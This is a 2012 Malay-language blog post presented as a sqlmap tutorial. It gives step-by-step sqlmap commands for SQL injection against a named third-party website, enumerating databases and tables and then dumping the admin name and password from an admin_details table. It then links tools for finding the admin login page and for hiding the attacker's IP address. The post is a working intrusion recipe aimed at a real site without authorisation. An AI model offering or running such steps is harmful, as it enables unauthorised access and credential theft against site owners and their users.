Wednesday, March 28, 2012

SqlMaps Tutorial



Barang yg perlu ada:

--> Download Python 2.7 - http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi

--> Download Sqlmap - http://cdnetworks-kr-1.dl.sourceforge.net/project/sqlmap/sqlmap/0.9/sqlmap-0.9.zip

--> CMD (same jea dgn command prompt)

--> vuln website <TARGET>( http://grinbo.at/events_detail.php?id=62' )

--> Tools utk sembunyi ip address korg leh tngok kt sini
http://nospain-dot-com.blogspot.com/2012/03/tool-for-hiding-ip-address.html




NOTE: KALAU KUA SIMBOL NI " > " ATAU KUA OPTIONS " Y/N " TEKAN JE ENTER



1.Install Python 2.7

2.Save sqlmap file dekat Local Disk(C:)

3.Buka CMD

4.Taip C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 --dbs dan tekan enter

5.Taip C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 --tables dan tekan enter

6.Taip C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 -T admin_details --columns dan tekan enter

7.Taip C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 -T admin_details -C admin_name -U test --dump dan tekan enter

8.Taip C:\sqlmap\sqlmap.py -u http://grinbo.at/events_detail.php?id=62 -D usr_web14_1 -T admin_details -C admin_password -U test --dump dan tekan enter


DONE!!
ID utk login laman web tu de kt step 7
Pass utk login laman web tu de kt step 8


Sekarang kte cari admin page login pulak
Cari admin login kt laman web ni
http://tools.th3-0utl4ws.com/admin-finder/


Kalau tutor sqlmap bagi backtrack leh tengok kt sini
http://www.youtube.com/watch?feature=player_embedded&v=edLuLiOyTQU


CREDITS: Seth Erry DotMy
http://h4ckingtutors.blogspot.com/2012/03/cara-mengunakan-sqlmaps.html
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)